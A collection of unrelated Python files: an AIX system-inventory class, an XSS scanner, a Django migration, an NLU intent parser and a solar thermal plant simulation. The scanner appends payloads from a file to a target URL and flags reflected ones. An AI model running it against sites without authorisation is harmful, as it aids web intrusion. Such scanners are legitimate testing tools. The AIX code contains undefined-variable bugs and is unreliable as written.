return "v" + version in set(subprocess.check_output([which("git"), "tag", "--list"]).decode().splitlines())
def run(cmd):
print(subprocess.list2cmdline(cmd))
subprocess.check_call(cmd)
REPO_ROOT = Path(__file__).parent.parent
ABOUT_PY = REPO_ROOT / "vunit" / "about.py"
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
import os
import re
import sys
import time
import psutil
import platform
import subprocess
# Syslog handler
import TeddixLogger
# Config parser
import TeddixConfigFile
class TeddixAix:
def __init__(self,syslog):
self.syslog = syslog
self.system = platform.system()
self.arch = platform.architecture()
self.machine = platform.machine()
self.name = 'IBM AIX'
self.ver = parser.readstdout('oslevel')
self.detail = self.name + self.ver
self.kernel = platform.release()
self.manufacturer= 'IBM'
self.serial = ''
self.syslog.info("Detected: %s (%s) arch: %s" % (self.system,self.kernel,self.machine))
# Get PCI devices
def getpci(self):
self.syslog.debug("Detecting PCI devices " )
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -p pci0')
pcidev = {}
for i in range(len(lines)):
if parser.strsearch('^([^ ]+)[ ]+\w+[ ]+[^ ]+[ ]+.+',lines[i]):
path = parser.strsearch('^[^ ]+[ ]+\w+[ ]+([^ ]+)[ ]+.+',lines[i])
devtype = parser.strsearch('^[^ ]+[ ]+\w+[ ]+[^ ]+[ ]+(.+)',lines[i])
vendor = ''
model = ''
revision= ''
pcidev[i] = [path,devtype,vendor,model,revision]
return pcidev
# Get Block devices
def getblock(self):
self.syslog.debug("Detecting block devices " )
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -Ccdisk')
blockdev = {}
for i in range(len(lines)):
if parser.strsearch('^([^ ]+)[ ]+\w+[ ]+.+',lines[i]):
name = parser.strsearch('^([^ ]+)[ ]+\w+[ ]+.+',lines[i])
devtype = parser.strsearch('^[^ ]+[ ]+\w+[ ]+(.+)',lines[i])
vendor = ''
model = ''
nr_sectors = ''
sect_size = ''
rotational = ''
readonly = ''
removable = ''
major = ''
minor = ''
blockdev[i] = [name,devtype,vendor,model,nr_sectors,sect_size,rotational,readonly,removable,major,minor]
return blockdev
# Get installed packages
def getpkgs(self):
self.syslog.debug("Getting package list " )
parser = TeddixParser.TeddixStringParser()
#lslpp -Lc
#Package Name:Fileset:Level:State:PTF Id:Fix State:Type:Description:Destination Dir.:Uninstaller:Message Catalog:Message Set:Message Number:Parent:Automatic:EFIX Locked:Install Path:Build Date
#sudo:sudo-1.6.7p5-2:1.6.7p5-2: : :C:R:Allows restricted root access for specified users.: :/bin/rpm -e sudo: : : : :0: :/opt/freeware:Tue Apr 27 18:35:51 WET 2004
packages = { }
lines = parser.readstdout('lslpp -Lc')
for i in range(len(lines)):
name = parser.strsearch('(.+):.+:.+:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
ver = parser.strsearch('.+:.+:(.+):.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
pkgsize = ''
instalsize = ''
section = ''
status = ''
info = parser.strsearch('.+:.+:.+:.*:.*:.*:.*:(.*):.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
homepage = ''
signed = ''
files = ''
arch = ''
publisher = ''
release = ''
packages[i] = [name,ver,pkgsize,instalsize,section,status,info,homepage,signed,files,arch]
return packages
# Get updates
def getupdates(self):
self.syslog.debug("Listing available updates")
parser = TeddixParser.TeddixStringParser()
# suma -x -a Action=Preview
updates = { }
return updates
# Get partitions
def getpartitions(self):
self.syslog.debug("Getting filesystem list ")
parser = TeddixParser.TeddixStringParser()
# no support from psutil
disks = { }
output = parser.readstdout('df')
lines = parser.arrayfilter('^([^ ]+)[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',output)
for i in range(len(lines)):
fstotal = parser.strsearch('^[^ ]+[ ]+([\d\-]+)[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsfree = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+([\d\-]+)[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsused = unicode(parser.str2int(fstotal) - parser.str2int(fsfree))
fspercent = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+[\d\-]+[ ]+([\d\%\-]+)[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsdev = parser.strsearch('^([^ ]+)[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsmount = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+(.+)',lines[i])
fstype = ''
fsopts = ''
disks[i] = [fsdev,fsmount,fstype,fsopts,fstotal,fsused,fsfree,fspercent]
return disks
# Get swap
def getswap(self):
self.syslog.debug("Reading swap filesystems")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout('lsps -ac')
lines = parser.arrayfilter('.*:(.*):.*:.*:.*:.*:.*:.*',output)
swaps = { }
for i in range(len(lines)):
dev = parser.strsearch('.*:(.*):.*:.*:.*:.*:.*:.*',lines[i])
swaptype = parser.strsearch('.*:.*:.*:.*:.*:.*:.*:(.*)',lines[i])
total = parser.strsearch('.*:.*:.*:(.*):.*:.*:.*:.*',lines[i])
used = ''
free = ''
swaps[i] = [dev,swaptype,total,used,free]
return swaps
# Get network interfaces
def getnics(self):
self.syslog.debug("Looking for available network interfaces ")
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -Cc if')
nics = {}
for i in range(len(lines)):
name = parser.strsearch('^([^ ]+)[ ]+\w+[ ]+[^ ]+',lines[i])
lines2 = parser.readstdout("entstat -d " + name)
macaddr = parser.arraysearch('Hardware Address: ([\w:.-]+)',lines2)
description = parser.strsearch('^[^ ]+[ ]+\w+[ ]+([^ ]+)',lines[i])
status = parser.strsearch('^[^ ]+[ ]+(\w+)[ ]+[^ ]+',lines[i])
# TODO:
rx_packets = ''
rx_bytes = ''
tx_packets = ''
tx_bytes = ''
driver = ''
kernmodule = ''
drvver = ''
nictype = ''
driver = ''
firmware = ''
nics[i] = [name,description,nictype,status,rx_packets,tx_packets,rx_bytes,tx_bytes,driver,drvver,firmware,kernmodule,macaddr]
return nics
# Get ipv4 address
def getip(self,nic):
self.syslog.debug("Reading %s IPv4 configuraion" % nic)
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout("lsattr -El " + nic)
ipv4 = parser.arraysearch('netaddr[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines[i])
mask = parser.arraysearch('netmask[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines[i])
bcast = ''
ips = { }
ips[0] = [ipv4,mask,bcast]
return ips
# Get ipv6 address
def getip6(self,nic):
self.syslog.debug("Reading %s IPv6 configuraion" % nic)
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout("lsattr -El " + nic)
ipv4 = parser.arraysearch('netaddr6[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines[i])
mask = parser.arraysearch('prefixlen[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines[i])
bcast = ''
ips6 = { }
ips6[0] = [ipv4,mask,bcast]
return ips6
# Get dnsservers
def getdns(self):
self.syslog.debug("Reading DNS configuration")
parser = TeddixParser.TeddixStringParser()
lines = parser.readlines('/etc/resolv.conf')
i = 0
j = 0
dns = { }
for i in range(len(lines)):
nameserver = parser.strsearch('^nameserver[ \t]+(.+)',lines[i])
domain = parser.strsearch('^domain[ \t]+(.+)',lines[i])
search = parser.strsearch('^search[ \t]+(.+)',lines[i])
if nameserver:
dns[j] = ['nameserver',nameserver]
j += 1
elif domain:
dns[j] = ['domain',domain]
j += 1
elif search:
dns[j] = ['search',search]
j += 1
i += 1
return dns
# Get routes
def getroutes(self):
self.syslog.debug("Reading routing table for ipv4 ")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout("netstat -rn -f inet")
lines = parser.arrayfilter('^(.+)[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',output)
routes = { }
for i in range(len(lines)):
destination = parser.strsearch('^(.+)[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
mask = ''
gateway = parser.strsearch('^.+[ ]+([\d\.])+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
interface = parser.strsearch('^.+[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+([^ ]+)[ ]+',lines[i])
flags = parser.strsearch('^.+[ ]+[\d\.]+[ ]+(\w+)[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
metric = ''
routes[i] = [destination,gateway,mask,flags,metric,interface]
i += 1
return routes
# Get routes
def getroutes6(self):
self.syslog.debug("Reading routing tables for ipv6 ")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout("netstat -rn -f inet6")
lines = parser.arrayfilter('^([:a-zA-Z\d]+)[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',output)
routes6 = { }
for i in range(len(lines)):
destination = parser.strsearch('^([:a-zA-Z\d]+)[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
mask = ''
gateway = parser.strsearch('^[:a-zA-Z\d]+[ ]+([:a-zA-Z\d]+)[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
interface = parser.strsearch('^[:a-zA-Z\d]+[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+([^ ]+)[ ]+',lines[i])
flags = parser.strsearch('^[:a-zA-Z\d]+[ ]+[:a-zA-Z\d]+[ ]+(\w+)[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
metric = ''
routes6[i] = [destination,gateway,mask,flags,metric,interface]
return routes6
# Get groups
def getgroups(self):
self.syslog.debug("Reading system groups")
parser = TeddixParser.TeddixStringParser()
return {}
# Get users
def getusers(self):
self.syslog.debug("Reading system users")
parser = TeddixParser.TeddixStringParser()
return {}
# Get procs
def getprocs(self):
self.syslog.debug("Listing system procs")
parser = TeddixParser.TeddixStringParser()
return {}
# Get services
def getsvcs(self):
self.syslog.debug("Getting system services")
parser = TeddixParser.TeddixStringParser()
return {}
|
import requests
import color
from color import *
def xss():
fname = "payloads.txt"
with open(fname) as f:
content = f.readlines()
payloads = [x.strip() for x in content]
print(T + "Works best if there is a query at the end. eg. http://example.com?search=" + W)
url = input(''+T+'' + color.UNDERLINE + 'Full URL> ' + color.END)
vuln = []
for payload in payloads:
payload = payload
xss_url = url+payload
r = requests.get(xss_url)
if payload.lower() in r.text.lower():
print(G + "[+] Vulnerable: " + W + payload)
if(payload not in vuln):
vuln.append(payload)
else:
print(R + "[!] Not vulnerable!" + W)
print("--------------------\n" + G + "Available Payloads:" + W)
print('\n'.join(vuln))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-07-09 18:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('orgManager', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='I_Organization',
new_name='Organization',
),
]
|
from __future__ import print_function, absolute_import
from abc import ABCMeta, abstractmethod
from builtins import object
from pathlib import Path
from future.utils import with_metaclass
from snips_nlu.constants import UTTERANCES, SLOT_NAME, ENTITY, TEXT, DATA
INTENT_FORMATTING_ERROR = AssertionError(
"Intent file is not properly formatted")
class IntentDataset(object):
"""Dataset of an intent
Can parse utterances from a text file or an iterator.
An example of utterance is:
"the [role:role](president) of [country:country](France)"
a Tag is in this format:
[slot:entity_name](text_to_tag)
Attributes:
intent_name (str): name of the intent
utterances (list of :class:`.IntentUtterance`): intent utterances
"""
def __init__(self, intent_name):
self.intent_name = intent_name
self.utterances = []
@classmethod
def from_file(cls, filepath):
filepath = Path(filepath)
stem = filepath.stem
if not stem.startswith("intent_"):
raise AssertionError("Intent filename should start with 'intent_' "
"but found: %s" % stem)
intent_name = stem[7:]
if not intent_name:
raise AssertionError("Intent name must not be empty")
with filepath.open(encoding="utf-8") as f:
lines = iter(l.strip() for l in f if l.strip())
return cls.from_iter(intent_name, lines)
@classmethod
def from_iter(cls, intent_name, samples_iter):
"""Generates a dataset from an iterator of samples"""
dataset = cls(intent_name)
for sample in samples_iter:
utterance = IntentUtterance.parse(sample)
dataset.add(utterance)
return dataset
def add(self, utterance):
"""Adds an :class:`.IntentUtterance` to the dataset"""
self.utterances.append(utterance)
@property
def json(self):
"""Intent dataset in json format"""
return {
UTTERANCES: [
{DATA: [chunk.json for chunk in utterance.chunks]}
for utterance in self.utterances
]
}
@property
def entities_names(self):
"""Set of entity names present in the intent dataset"""
return set(chunk.entity for u in self.utterances
for chunk in u.chunks if isinstance(chunk, SlotChunk))
class IntentUtterance(object):
def __init__(self, input, chunks):
self.input = input
self.chunks = chunks
@property
def annotated(self):
"""Annotates with *
Returns: The sentence annotated just with stars
Examples:
>>> from snips_nlu.cli.dataset.intent_dataset import \
IntentUtterance
>>> p = "the [role:role](president) of [country:country](France)"
>>> u = IntentUtterance.parse(p)
>>> u.annotated
'the *president* of *France*'
"""
binput = bytearray(self.input, 'utf-8')
acc = 0
star = ord('*')
for chunk in self.chunks:
if isinstance(chunk, SlotChunk):
binput.insert(chunk.range.start + acc, star)
binput.insert(chunk.range.end + acc + 1, star)
acc += 2
return binput.decode('utf-8')
@staticmethod
def stripped(input, chunks):
acc = 0
s = ''
new_chunks = []
for chunk in chunks:
start = chunk.range.start
end = chunk.range.end
s += input[start:end]
if isinstance(chunk, SlotChunk):
acc += chunk.tag_range.size
rng = Range(start - acc, end - acc)
new_chunk = SlotChunk(chunk.name, chunk.entity, rng,
chunk.text, chunk.tag_range)
new_chunks.append(new_chunk)
acc += 1
else:
rng = Range(start - acc, end - acc)
new_chunks.append(TextChunk(chunk.text, rng))
return s, new_chunks
@staticmethod
def parse(string):
"""Parses an utterance
Args:
string (str): an utterance in the class:`.Utterance` format
Examples:
>>> from snips_nlu.cli.dataset.intent_dataset import \
IntentUtterance
>>> u = IntentUtterance.\
parse("president of [country:default](France)")
>>> len(u.chunks)
2
>>> u.chunks[0].text
'president of '
>>> u.chunks[0].range.start
0
>>> u.chunks[0].range.end
13
"""
sm = SM(string)
capture_text(sm)
string, chunks = IntentUtterance.stripped(string, sm.chunks)
return IntentUtterance(string, chunks)
class Chunk(with_metaclass(ABCMeta, object)):
def __init__(self, text, range):
self.text = text
self.range = range
@abstractmethod
def json(self):
pass
class SlotChunk(Chunk):
def __init__(self, slot_name, entity, range, text, tag_range):
super(SlotChunk, self).__init__(text, range)
self.name = slot_name
self.entity = entity
self.tag_range = tag_range
@property
def json(self):
return {
TEXT: self.text,
SLOT_NAME: self.name,
ENTITY: self.entity,
}
class TextChunk(Chunk):
@property
def json(self):
return {
TEXT: self.text
}
class Range(object):
def __init__(self, start, end=None):
self.start = start
self.end = end
@property
def size(self):
return self.end - self.start + 1
class SM(object):
"""State Machine for parsing"""
def __init__(self, input):
self.input = input
self.chunks = []
self.current = 0
def add_slot(self, slot_start, name, entity):
"""Adds a named slot
Args:
slot_start (int): position where the slot tag started
name (str): slot name
entity (str): entity name
"""
tag_range = Range(slot_start - 1)
chunk = SlotChunk(slot_name=name, entity=entity, range=None, text=None,
tag_range=tag_range)
self.chunks.append(chunk)
def add_text(self, text):
"""Adds a simple text chunk using the current position"""
start = self.current
end = start + len(text)
chunk = TextChunk(text=text, range=Range(start=start, end=end))
self.chunks.append(chunk)
def add_tagged(self, text):
"""Adds text to the last slot"""
if not self.chunks:
raise AssertionError("Cannot add tagged text because chunks list "
"is empty")
chunk = self.chunks[-1]
chunk.text = text
chunk.tag_range.end = self.current - 1
chunk.range = Range(start=self.current, end=self.current + len(text))
def find(self, s):
return self.input.find(s, self.current)
def move(self, pos):
"""Moves the cursor of the state to position after given
Args:
pos (int): position to place the cursor just after
"""
self.current = pos + 1
def peek(self):
return self[0]
def read(self):
c = self[0]
self.current += 1
return c
def __getitem__(self, key):
current = self.current
if isinstance(key, int):
return self.input[current + key]
elif isinstance(key, slice):
start = current + key.start if key.start else current
return self.input[slice(start, key.stop, key.step)]
else:
raise TypeError("Bad key type: %s" % type(key))
def capture_text(state):
next_pos = state.find('[')
sub = state[:] if next_pos < 0 else state[:next_pos]
if sub.strip():
state.add_text(sub)
if next_pos >= 0:
state.move(next_pos)
capture_slot(state)
def capture_slot(state):
slot_start = state.current
next_pos = state.find(':')
if next_pos < 0:
raise INTENT_FORMATTING_ERROR
else:
slot_name = state[:next_pos]
state.move(next_pos)
next_pos = state.find(']')
if next_pos < 0:
raise INTENT_FORMATTING_ERROR
entity = state[:next_pos]
state.move(next_pos)
state.add_slot(slot_start, slot_name, entity)
if state.read() != '(':
raise INTENT_FORMATTING_ERROR
capture_tagged(state)
def capture_tagged(state):
next_pos = state.find(')')
if next_pos < 1:
raise INTENT_FORMATTING_ERROR
else:
tagged_text = state[:next_pos]
state.add_tagged(tagged_text)
state.move(next_pos)
capture_text(state)
|
# -*- coding: utf-8 -*-
from tespy.networks import Network
from tespy.components import (
Sink, Source, Turbine, Condenser, Pump, Merge, Splitter,
Valve, HeatExchanger, ParabolicTrough, CycleCloser, Compressor, Drum)
from tespy.connections import Connection, Bus, Ref
from tespy.tools import CharLine
from tespy.tools import document_model
import pandas as pd
import numpy as np
from tespy.tools import ExergyAnalysis
import plotly.graph_objects as go
# specification of ambient state
pamb = 1.013
Tamb = 25
# setting up network
SEGSvi = Network(fluids=['water', 'INCOMP::TVP1', 'air'])
SEGSvi.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg',
m_unit='kg / s', s_unit="kJ / kgK")
# components definition
air_in = Source('Ambient air source', fkt_group='CW')
air_out = Sink('Ambient air sink', fkt_group='CW')
closer_pt = CycleCloser('Cycle closer pt', fkt_group='SF')
pt = ParabolicTrough('Parabolic trough', fkt_group='SF')
ptpump = Pump('HTF pump', fkt_group='SF')
closer = CycleCloser('Cycle closer power cycle', fkt_group='SG')
eco = HeatExchanger('Economizer', fkt_group='SG')
eva = HeatExchanger('Evaporator', fkt_group='SG')
sup = HeatExchanger('Superheater', fkt_group='SG')
drum = Drum('Drum', fkt_group='SG')
reh = HeatExchanger('Reheater', fkt_group='RH')
hpt1 = Turbine('HP turbine 1', fkt_group='HPT')
hpt2 = Turbine('HP turbine 2', fkt_group='HPT')
lpt1 = Turbine('LP turbine 1', fkt_group='LPT')
lpt2 = Turbine('LP turbine 2', fkt_group='LPT')
lpt3 = Turbine('LP turbine 3', fkt_group='LPT')
lpt4 = Turbine('LP turbine 4', fkt_group='LPT')
lpt5 = Turbine('LP turbine 5', fkt_group='LPT')
cond = Condenser('Condenser', fkt_group='CW')
condpump = Pump('Condenser pump', fkt_group='CW')
fwt = Merge('Feedwater tank', num_in=3, fkt_group='LPP')
fwp = Pump('Feedwater pump', fkt_group='FWP')
cwp = Pump('Cooling water pump', fkt_group='CW')
closer_cw = CycleCloser('Cycle closer cw', fkt_group='CW')
ct = HeatExchanger('Cooling tower', fkt_group='CW')
fan = Compressor('Cooling tower fan', fkt_group='CW')
sp1 = Splitter('Splitter 1', fkt_group='HPT')
sp2 = Splitter('Splitter 2', fkt_group='HPT')
sp3 = Splitter('Splitter 3', fkt_group='LPT')
sp4 = Splitter('Splitter 4', fkt_group='LPT')
sp5 = Splitter('Splitter 5', fkt_group='LPT')
sp6 = Splitter('Splitter 6', fkt_group='LPT')
sp7 = Splitter('Splitter 7', fkt_group='SF')
m1 = Merge('Merge 1', fkt_group='CW')
m2 = Merge('Merge 2', fkt_group='HPP')
m3 = Merge('Merge 3', fkt_group='LPP')
m4 = Merge('Merge 4', fkt_group='LPP')
m5 = Merge('Merge 5', fkt_group='SF')
v1 = Valve('Valve 1', fkt_group='HPP')
v2 = Valve('Valve 2', fkt_group='HPP')
v3 = Valve('Valve 3', fkt_group='LPP')
v4 = Valve('Valve 4', fkt_group='LPP')
v5 = Valve('Valve 5', fkt_group='LPP')
hppre1 = Condenser('High pressure preheater 1', fkt_group='HPP')
hppre2 = Condenser('High pressure preheater 2', fkt_group='HPP')
hppre1_sub = HeatExchanger('High pressure preheater 1 subcooling', fkt_group='HPP')
hppre2_sub = HeatExchanger('High pressure preheater 2 subcooling', fkt_group='HPP')
lppre1 = Condenser('Low pressure preheater 1', fkt_group='LPP')
lppre2 = Condenser('Low pressure preheater 2', fkt_group='LPP')
lppre3 = Condenser('Low pressure preheater 3', fkt_group='LPP')
lppre1_sub = HeatExchanger('Low pressure preheater 1 subcooling', fkt_group='LPP')
lppre2_sub = HeatExchanger('Low pressure preheater 2 subcooling', fkt_group='LPP')
lppre3_sub = HeatExchanger('Low pressure preheater 3 subcooling', fkt_group='LPP')
# connections definition
# power cycle
c1 = Connection(sup, 'out2', closer, 'in1', label='1')
c2 = Connection(closer, 'out1', hpt1, 'in1', label='2')
c3 = Connection(hpt1, 'out1', sp1, 'in1', label='3')
c4 = Connection(sp1, 'out1', hpt2, 'in1', label='4')
c5 = Connection(hpt2, 'out1', sp2, 'in1', label='5')
c6 = Connection(sp2, 'out1', reh, 'in2', label='6')
c7 = Connection(reh, 'out2', lpt1, 'in1', label='7')
c8 = Connection(lpt1, 'out1', sp3, 'in1', label='8')
c9 = Connection(sp3, 'out1', lpt2, 'in1', label='9')
c10 = Connection(lpt2, 'out1', sp4, 'in1', label='10')
c11 = Connection(sp4, 'out1', lpt3, 'in1', label='11')
c12 = Connection(lpt3, 'out1', sp5, 'in1', label='12')
c13 = Connection(sp5, 'out1', lpt4, 'in1', label='13')
c14 = Connection(lpt4, 'out1', sp6, 'in1', label='14')
c15 = Connection(sp6, 'out1', lpt5, 'in1', label='15')
c16 = Connection(lpt5, 'out1', m1, 'in1', label='16')
c17 = Connection(m1, 'out1', cond, 'in1', label='17')
c18 = Connection(cond, 'out1', condpump, 'in1', label='18')
c19 = Connection(condpump, 'out1', lppre1, 'in2', label='19')
# c19 = Connection(condpump, 'out1', lppre1_sub, 'in2', label='19')
# c20 = Connection(lppre1_sub, 'out2', lppre1, 'in2', label='20')
c21 = Connection(lppre1, 'out2', lppre2, 'in2', label='21')
# c21 = Connection(lppre1, 'out2', lppre2_sub, 'in2', label='21')
# c22 = Connection(lppre2_sub, 'out2', lppre2, 'in2', label='22')
c23 = Connection(lppre2, 'out2', lppre3, 'in2', label='23')
# c23 = Connection(lppre2, 'out2', lppre3_sub, 'in2', label='23')
# c24 = Connection(lppre3_sub, 'out2', lppre3, 'in2', label='24')
c25 = Connection(lppre3, 'out2', fwt, 'in1', label='25')
c26 = Connection(fwt, 'out1', fwp, 'in1', label='26')
c27 = Connection(fwp, 'out1', hppre1, 'in2', label='27')
c29 = Connection(hppre1, 'out2', hppre2, 'in2', label='29')
c31 = Connection(hppre2, 'out2', eco, 'in2', label='31')
c36 = Connection(sp1, 'out2', hppre2, 'in1', label='36')
c37 = Connection(hppre2, 'out1', v1, 'in1', label='37')
c39 = Connection(v1, 'out1', m2, 'in2', label='39')
c40 = Connection(sp2, 'out2', m2, 'in1', label='40')
c41 = Connection(m2, 'out1', hppre1, 'in1', label='41')
c42 = Connection(hppre1, 'out1', v2, 'in1', label='42')
c44 = Connection(v2, 'out1', fwt, 'in2', label='44')
c45 = Connection(sp3, 'out2', fwt, 'in3', label='45')
c46 = Connection(sp4, 'out2', lppre3, 'in1', label='46')
c47 = Connection(lppre3, 'out1', v3, 'in1', label='47')
# c47 = Connection(lppre3, 'out1', lppre3_sub, 'in1', label='47')
# c48 = Connection(lppre3_sub, 'out1', v3, 'in1', label='48')
c49 = Connection(v3, 'out1', m3, 'in1', label='49')
c50 = Connection(sp5, 'out2', m3, 'in2', label='50')
c51 = Connection(m3, 'out1', lppre2, 'in1', label='51')
c52 = Connection(lppre2, 'out1', v4, 'in1', label='52')
# c52 = Connection(lppre2, 'out1', lppre2_sub, 'in1', label='52')
# c53 = Connection(lppre2_sub, 'out1', v4, 'in1', label='53')
c54 = Connection(v4, 'out1', m4, 'in2', label='54')
c55 = Connection(sp6, 'out2', m4, 'in1', label='55')
c56 = Connection(m4, 'out1', lppre1, 'in1', label='56')
c57 = Connection(lppre1, 'out1', v5, 'in1', label='57')
# c57 = Connection(lppre1, 'out1', lppre1_sub, 'in1', label='57')
# c58 = Connection(lppre1_sub, 'out1', v5, 'in1', label='58')
c59 = Connection(v5, 'out1', m1, 'in2', label='59')
# components from subsystem
c32 = Connection(eco, 'out2', drum, 'in1', label='32')
c33 = Connection(drum, 'out1', eva, 'in2', label='33')
c34 = Connection(eva, 'out2', drum, 'in2', label='34')
c35 = Connection(drum, 'out2', sup, 'in2', label='35')
c73 = Connection(sup, 'out1', eva, 'in1', label='73')
c74 = Connection(eva, 'out1', eco, 'in1', label='74')
# cooling water
c60 = Connection(cond, 'out2', closer_cw, 'in1', label='60')
c61 = Connection(closer_cw, 'out1', ct, 'in1', label='61')
c62 = Connection(ct, 'out1', cwp, 'in1', label='62')
c63 = Connection(cwp, 'out1', cond, 'in2', label='63')
# cooling tower
c64 = Connection(air_in, 'out1', fan, 'in1', label='64')
c65 = Connection(fan, 'out1', ct, 'in2', label='65')
c66 = Connection(ct, 'out2', air_out, 'in1', label='66')
# parabolic trough cycle
c70 = Connection(pt, 'out1', closer_pt, 'in1', label='70')
c71 = Connection(closer_pt, 'out1', sp7, 'in1', label='71')
c72 = Connection(sp7, 'out1', sup, 'in1', label='72')
c75 = Connection(eco, 'out1', m5, 'in1', label='75')
c76 = Connection(sp7, 'out2', reh, 'in1', label='76')
c77 = Connection(reh, 'out1', m5, 'in2', label='77')
c78 = Connection(m5, 'out1', ptpump, 'in1', label='78')
c79 = Connection(ptpump, 'out1', pt, 'in1', label='79')
# add connections to network
SEGSvi.add_conns(
c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, c13, c14, c15, c16, c17,
c18, c19, c21, c23, c25, c26, c27, c29, c31, c32, c33, c34,
c35, c36, c37, c39, c40, c41, c42, c44, c45, c46, c47, c49, c50, c51,
c52, c54, c55, c56, c57, c59, c60, c61, c62, c63, c64, c65, c66,
c70, c71, c72, c73, c74, c75, c76, c77, c78, c79)
# power bus
power = Bus('total output power')
power.add_comps({'comp': hpt1, 'char': 0.97, 'base': 'component'},
{'comp': hpt2, 'char': 0.97, 'base': 'component'},
{'comp': lpt1, 'char': 0.97, 'base': 'component'},
{'comp': lpt2, 'char': 0.97, 'base': 'component'},
{'comp': lpt3, 'char': 0.97, 'base': 'component'},
{'comp': lpt4, 'char': 0.97, 'base': 'component'},
{'comp': lpt5, 'char': 0.97, 'base': 'component'},
{'comp': fwp, 'char': 0.95, 'base': 'bus'},
{'comp': condpump, 'char': 0.95, 'base': 'bus'},
{'comp': ptpump, 'char': 0.95, 'base': 'bus'},
{'comp': cwp, 'char': 0.95, 'base': 'bus'},
{'comp': fan, 'char': 0.95, 'base': 'bus'})
heat_input_bus = Bus('heat input')
heat_input_bus.add_comps({'comp': pt, 'base': 'bus'})
exergy_loss_bus = Bus('exergy loss')
exergy_loss_bus.add_comps({'comp': air_in, 'base': 'bus'}, {'comp': air_out})
SEGSvi.add_busses(power, heat_input_bus, exergy_loss_bus)
# component parameters
pt.set_attr(doc=0.95, aoi=0,
Tamb=25, A='var', eta_opt=0.73,
c_1=0.00496, c_2=0.000691, E=1000,
iam_1=1, iam_2=1)
ptpump.set_attr(eta_s=0.6)
eco.set_attr()
eva.set_attr(ttd_l=5)
sup.set_attr()
hpt1.set_attr(eta_s=0.8376)
hpt2.set_attr(eta_s=0.8463)
lpt1.set_attr(eta_s=0.8623)
lpt2.set_attr(eta_s=0.917)
lpt3.set_attr(eta_s=0.9352)
lpt4.set_attr(eta_s=0.88)
lpt5.set_attr(eta_s=0.6445)
cond.set_attr(pr1=1, pr2=0.9, ttd_u=5)
condpump.set_attr(eta_s=0.7)
fwp.set_attr(eta_s=0.7)
cwp.set_attr(eta_s=0.7)
ct.set_attr(pr1=0.95)
fan.set_attr(eta_s=0.6)
lppre1.set_attr(pr1=1, ttd_u=5)
lppre2.set_attr(pr1=1, ttd_u=5)
lppre3.set_attr(pr1=1, ttd_u=5)
hppre1.set_attr(pr1=1, ttd_u=5)
hppre2.set_attr(pr1=1, ttd_u=5)
lppre1_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
lppre2_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
lppre3_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
hppre1_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
hppre2_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
# connection parameters
# parabolic trough cycle
c70.set_attr(fluid={'TVP1': 1, 'water': 0, 'air': 0}, T=390, p=23.304)
c76.set_attr(m=Ref(c70, 0.1284, 0))
c73.set_attr(p=22.753)
c74.set_attr(p=21.167)
c78.set_attr(p=20.34)
c79.set_attr(p=41.024)
# cooling water
c62.set_attr(fluid={'TVP1': 0, 'water': 1, 'air': 0}, T=30, p=pamb)
# cooling tower
c64.set_attr(fluid={'water': 0, 'TVP1': 0, 'air': 1}, p=pamb, T=Tamb)
c65.set_attr(p=pamb + 0.0005)
c66.set_attr(p=pamb, T=30)
# power cycle
c32.set_attr(Td_bp=-2)
c34.set_attr(x=0.5)
